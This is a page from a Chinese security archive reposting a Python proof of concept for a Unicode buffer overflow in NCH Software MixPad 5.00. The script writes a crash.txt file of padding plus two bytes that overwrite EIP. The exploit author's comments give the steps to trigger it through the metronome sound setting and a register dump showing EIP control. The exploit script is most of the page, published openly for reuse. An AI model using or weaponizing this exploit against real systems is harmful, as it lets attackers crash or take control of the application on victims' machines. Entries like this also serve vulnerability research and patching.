首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
MixPad 5.00 - Buffer Overflow
来源:@bzyo_ 作者:bzyo 发布时间:2018-01-24  
#!/usr/bin/python
 
#
# Exploit Author: bzyo
# Twitter: @bzyo_
# Exploit Title: NCH Software MixPad v5.00 - Unicode Buffer Overflow
# Date: 21-01-2017
# Vulnerable Software: NCH Software MixPad
# Vendor Homepage: http://www.nch.com.au/mixpad
# Version: v5.00
# Software Link: http://www.nch.com.au/mixpad/mpsetup.exe
# Tested On: Windows XP
#
#
# PoC: generate crash.txt, options, metronome tab, paste crash.txt in 'choose a custom metronome sound'
#
# no unicode jmp/call to esp
#
# EAX 00117700
# ECX 001167F0
# EDX 7C90E514 ntdll.KiFastSystemCallRet
# EBX 00000000
# ESP 00116C40 UNICODE "BBBBBB does not exist or cannot be accessed."
# EBP 00116FAC
# ESI 0000004E
# EDI 00117740
# EIP 00CC00CC
 
filename="crash.txt"
 
junk = "A"*251
eip = "\xcc"*2              #eip over; jmp/call esp goes here
fill = "B"*100              #only 6 used in esp
buffer = junk + eip + fill
 
  
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·NEC Univerge SV9100/SV8100 Web
·RAVPower 2.000.056 - Memory Di
·Simple ASC CMS 1.2 Database Di
·HP Connected Backup 8.6/8.8.6
·PHPFreeChat 1.7 - Denial of Se
·Photography CMS 1.0 - Cross-Si
·macOS 10.13 (17A365) - Kernel
·Asus Unauthenticated LAN Remot
·Smiths Medical Medfusion 4000
·MikroTik RouterOS < 6.38.5 Rem
·glibc - 'getcwd()' Local Privi
·GoAhead Web Server LD_PRELOAD
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved